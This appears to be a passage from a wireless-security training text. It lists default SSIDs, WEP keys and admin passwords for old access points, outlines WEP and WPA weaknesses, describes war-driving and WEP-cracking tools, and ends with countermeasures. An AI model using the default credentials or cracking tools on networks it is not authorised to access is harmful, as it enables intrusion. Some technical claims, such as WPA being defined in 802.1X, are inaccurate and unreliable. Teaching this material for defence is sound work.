LINKSYS WAP-11 802.11 DS Access Point
Default SSID: 'linksys'
Default Channel: 6
Default WEP key one: 10 11 12 13 14 15
Default WEP key two: 20 21 22 23 24 25
Default WEP key three: 30 31 32 33 34 35
Default WEP key four: 40 41 42 43 44 45
LINKSYS WPC-11 PCMCIA 802.11b DS 2.4 GHz - PC Card
Default SSID: 'linksys' ; 'Wireless'
Default Channel: 3 ; 6 ; 11
Netgear 802.11 DS ME102 / MA401
Default SSID: 'wireless'
Default Channel: 6
Default IP address: 192.168.0.5
Default WEP: Disabled
Default WEP KEY1: 11 11 11 11 11

51

Default WEP KEY2: 20 21 22 23 24

Default WEP KEY3: 30 31 32 33 34
Default WEP KEY4: 40 41 42 43 44
Default MAC: 00:30:ab:xx:xx:xx
SMC Access Point Family SMC2652W
Default SSID: 'WLAN'
Default Channel: 11
Default HTTP: user: default pass: WLAN_AP
Default MAC: 00:90:d1:00:b7:6b (00:90:d1:xx:xx:xx)
Console Port: No Password, AT command set
SMC 2526W Wireless Access Point Dual-Dipole
Default SSID: 'WLAN'
Default IP: 192.168.0.254
Default MAC: 00:90:d1:00:11:11(00:90:d1:xx:xx:xx)
Default AP Name: MiniAP
Default Channel: 11
Default Admin Pass: MiniAP
SMC 2682W EZ-Connect Wireless Bridge
Default SSID: 'BRIDGE'

52

Default Channel: 11
Default Admin pass: WLAN_BRIDGE
Default MAC:00:90:d1:00:b8:9c (00:90:d1:xx:xx:xx)
SOHOware NetBlaster II
Default SSID: same as mac
Default MAC:00:80:c6:xx:xx:xx
Default Channel:8
Symbol AP41x1 and LA41x1 / LA41X3 802.11 DS
Default SSID: '101
Default MAC: 00:a0:0f:xx:xx:xx
Default WEP key one: 10 1112 13 14 15
Default WEP key two: 20 21 22 23 24 25
Default WEP key three: 30 31 32 33 34 35
Default WEP key four: 40 41 42 43 44 45
TELETRONICS WL-Access Point
Default SSID: 'any'
Default Password: 1234
Console Port: No password, AT command set
Wave Lan Family

53

Default SSID: 'WaveLAN Network'

Default channel: 3
ZCOMAX Access Point XWL450
Default SSID: 'any'; 'mello' ; 'Test'
Default password: 1234
Console Port: No Password, AT command set
ZYXEL Prestige 316 Gateway/Natbox/WirelessBridge
Default SSID: 'Wireless'
Default Channel: 1
Default console pass: 1234
Default telnet pass: 1234
Console Port: Same password for system, ansi/vt100 terminal
1stWave Access Points
Default SSID: '1stWave'
ELSA Lancom Wireless L-11 / AirLancer
Default SSID: 'ELSA'

54

3.2 WEP & WPA Summery

WEP
WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to
provide for confidentiality of data on wireless networks at a level equivalent to that of wired
LANs.Wired LANs typically employ physical controls to prevent unauthorized users from
connecting to the network and viewing data. In a wireless LAN, the network can be
accessed without physically connecting to the LAN. IEEE chose to employ encryption at
the data link layer to prevent unauthorized eavesdropping on a network. This is
accomplished by encrypting data with the RC4 encryption algorithm.
Deficiencies of WEP

IV is too short, even not protected from reuse.

The per packet key is constructed from IV,making it susceptible to weak key attacks.

No effective detection message.

No inbuilt provision to update key in all wireless clients connected to access point.

No protection against message replay

WPA and WPA2

WPA stands for Wifi Protected Access. It is defined in IEEE 802.1X. It is basically
a RC4 stream cipher with 128 bit and 48 bit IV. It uses TKIP temporal key integrity
protocol and Message integrity code (MIC) Micheal to ensure data integrity.
Hacking Tool: Netstumbler: http://www.netstumbler.org

55

NetStumbler displays:
1. Signal Strength
2. MAC Address
3. SSID
4. Channel details
NetStumbler is a Windows-based war-driving tool that will detect wireless networks and
mark their relative position with a GPS. NetStumbler uses an 802.11 Probe Request sent to
the broadcast destination address, causing all access points in the area to issue 802.11 Probe
Response containing network configuration information, such as their SSID and WEP status.
When hooked up to a GPS, NetStumbler will record a GPS coordinate for the highest signal
strength found for each access point. Using the network and GPS data, the user can create
maps with tools such as Microsoft MapPoint.
1. AiroPeek: http://www.wildpackets.com
Airopeek is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all
higher level network protocols such as TCP/IP, Apple Talk, NetBUI and IPX. In addition,
AiroPeek quickly isolates security problems, fully decodes 802.11a and 802.11b WLAN
protocols, and analyzes wireless network performance with accurate identification of signal
strength, channel and data rates.

2. Airsnort : http://airsnort.shmoo.com/

AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates
by passively monitoring transmissions, computing the encryption key when enough packets
have been gathered. AirSnort requires approximately 5-10 million encrypted packets to be
gathered. Once enough packets have been gathered, AirSnort can guess the encryption
password in under a second

3. Kismet

Kismet is a 802.11b wireless network sniffer which separates and identifies different
wireless networks in the area. Kismet works with any wireless card which is capable of
reporting raw packets.
56

WEPCrack

WEPCrack is an open source tool for breaking 802.11 WEP secret keys. While Airsnort has
captured the media attention, WEPCrack was the first publically available code that
demonstrated the above attack.

The current tools are Perl based and are composed of the following scripts:

WeakIVGen.pl, prism-getIV.pl, WEPCrack.pl

Countermeasures:

Dont Configured WIFI Router as Unsecured Connection, It can be misused by

someone.

Usually ISP configure your phone number/mobile number as default Network Key in
Router. one should change it as soon as possible if so.

If configured as Unsecured Connection then enable the logging system. This helps
you to get MAC (Media Access Control) address of the machines which uses your
wifi router.

If Configured as Unsecured Connection then kindly install packet capturing software

or WLAN analyzing software so that you can keep eye on machines which uses your
wifi router.

If configured as Unsecured Connection then bind your MAC address with the router.
This will only allow your authenticated laptops to get connected to router.

Protect Your SSIDS & Dont use WEP while isp configures ur router.

Dont ever use viral networks like "Free internet" Or "wifi" Network because those
networks are designed to steal your data from laptop.

Maintain All types of Logs for atleast 6 months.

57